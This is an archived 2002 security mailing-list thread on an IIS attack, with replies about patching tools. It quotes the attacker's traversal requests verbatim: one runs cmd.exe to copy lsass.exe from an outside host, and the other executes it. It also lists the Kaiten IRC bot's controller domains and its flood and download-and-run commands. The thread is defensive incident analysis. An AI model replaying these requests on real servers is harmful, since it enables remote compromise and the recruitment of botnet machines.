Security Incidents mailing list archives
RE: new IIS worm? (rcp lsass.exe)
From: "John Campbell" <jcampbell () wsipc org>
Date: Tue, 24 Sep 2002 14:41:28 -0700
I actually prefer the opportunity to pick and choose. Not all hotfixes are necessary for a given installation, and historically at least, they aren't regression-tested as fully as services packs, (which aren't always perfect when they hit the street either.) If you do a lot of servers, it may make sense to set one up manually, test it thoroughly, then clone it with a disk imaging tool. -----Original Message----- From: zeno [mailto:bugtraq () cgisecurity net] Sent: Tuesday, September 24, 2002 2:08 PM To: John Campbell Cc: incidents () securityfocus com Subject: Re: new IIS worm? (rcp lsass.exe)
Windows Update from you-know-who actually does what you describe. I'd
always been leery of it, but tried it out recently when setting up a W2K test server, and it performed as advertised. It did take several iterations to get everything updated, owing to various dependencies.
When I used windows update it downloaded the patches but didn't install them. I had to manually go through each one. While this isn't a big deal I am looking for something 100 percent automated with install of the patches. Perhaps I'm missing something I deal mostly with unix. - zeno
Regards, John Campbell, CISSP, GCWN Information Security Engineer Washington School Information Processing Cooperative (WSIPC) Everett, Washington, USA -----Original Message----- From: zeno [mailto:bugtraq () cgisecurity net] Sent: Tuesday, September 24, 2002 11:29 AM To: Mark Challender Cc: 'pj () esec dk'; incidents () securityfocus com Subject: Re: new IIS worm? (rcp lsass.exe)Hardening of IIS with the tools available at Microsoft and using URLSCAN with the EXE blocking on will stop these attacks. Patch, patch, patch, recheck the patches and use URLSCAN!Does anyone know of a gui windows tool that scans your system and provides you with a list of needed patches, and then allows you to select, and have it autodownload and install them? I can't seem to find one (needed mostly for iis). - zeno () cgisecurity comMark Challender Network Administrator ================== Veni, Vidi, Geeki ================== -----Original Message----- From: pj () esec dk [mailto:pj () esec dk] Sent: Monday, September 23, 2002 3:27 AM To: incidents () securityfocus com Subject: Re: new IIS worm? (rcp lsass.exe) Christian Mock:Then it seems to go after the web servers, sending the following:GET/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:ls as s.exe+ . HTTP/1.0..andGET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0I've been able to get hold of that lsass.exe binary (9728 bytes), butI lack the skills to analyze it; I'll happily mail it to anybody who asks.We have seen this attack from 4 different sources since Sept. 16, and have informed the owner of 64.21.95.7 and downloaded the lsass.exe
for
investigation. Based on the attack rate this is most likely a scripted or manual attack, not a worm. Judging from the embedded string in this compressed binary it appears to be an IRC bot based on the kaiten.c code written by contem@efnet, the author of the Slapper worm : Kaiten Win32 API version 2002 by contem@efnet The binary contains these domainnames, most likeky IRC servers used for controlling the bot: telsa5.mine.nu (Korea) irc.logicfive.net (Taiwan) moncredo.shacknet.nu (USA) telsacredo.shacknet.nu (USA) lar.ath.cx (Taiwan) The program accepts commands to make various DOS attacks or download new version or executables with http: NOTICE %s :PUSH <target> <port> <secs> = A push flooder NOTICE %s :TCP <target> <port> <secs> = A syn flooder NOTICE %s :UDP <target> <port> <secs> = A udp flooder NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder NOTICE %s :NICK <nick> = Changes the nick of theclientNOTICE %s :DISABLE <pass> = Disables all packeting
from
thisclient NOTICE %s :ENABLE <pass> = Enables all packeting
from
thisclient NOTICE %s :UPDATE <http address> = Downloads a file off theweb andupdates the client NOTICE %s :RUN <http address> = Downloads a file off theweb andruns it NOTICE %s :GET <http address> = Downloads a file off thewebNOTICE %s :ADDSERVER <server> = Adds a server to the list NOTICE %s :DELSERVER <server> = Deletes a server from thelistNOTICE %s :LISTSERVERS = Lists server on the list NOTICE %s :KILL = Kills the client NOTICE %s :VERSION = Requests version of
client
NOTICE %s :HELP = Displays this There seems also to be a default account and password in the german language included in this specific version of Kaiten. The IIS attack that tries to inject this Trojan usually has another URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy an
connection to port 6667(IRC) on chat.vtm.be. Peter Jelver ... eSec A/S http://www.esec.dk
......................................................................
...... . PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7 -------------------------------------------------------------------- -- ------ This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com -------------------------------------------------------------------- -- ------ This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com---------------------------------------------------------------------- -- ---- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Re: new IIS worm? (rcp lsass.exe), (continued)
- Re: new IIS worm? (rcp lsass.exe) James Williams (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Ben Timby (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) sunzi (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Faisal Ashraf (Sep 26)
- Re: new IIS worm? (rcp lsass.exe) Christoph Puppe (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Dostie, Joe (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) webbi (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) Gaydosh, Adam (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) David LeBlanc (Sep 26)
- RE: new IIS worm? (rcp lsass.exe) Dallas Jordan (Sep 26)
- RE: new IIS worm? (rcp lsass.exe) Bax . Plemons (Sep 26)
- Re: new IIS worm? (rcp lsass.exe) Muhammad Faisal Rauf Danka (Sep 27)